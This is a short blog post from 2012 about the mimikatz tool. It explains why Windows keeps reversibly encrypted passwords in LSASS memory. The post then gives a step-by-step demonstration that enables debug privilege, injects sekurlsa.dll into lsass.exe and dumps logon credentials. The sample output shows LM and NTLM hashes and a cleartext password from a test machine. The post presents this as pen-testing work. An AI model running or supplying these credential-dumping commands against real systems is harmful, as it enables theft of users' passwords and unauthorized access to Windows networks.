MimiKatz – clear text passwords

March 29th, 2012 by admin in Password Info, windows

As you’ve seen in our previous post about WCE, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext form for SSO, they are cypher in reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Mimikatz is a tool to recover this plain-text password,it saves you time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a dll into lsass.exe to recover the information needed. The blog and program are in French

Below is a demonstration of how to use mimikatz, all commands typed are in red:
(The privilege::debug command is not required if you are already system.)

mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;160179
Package d’authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification  : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/

Leave a reply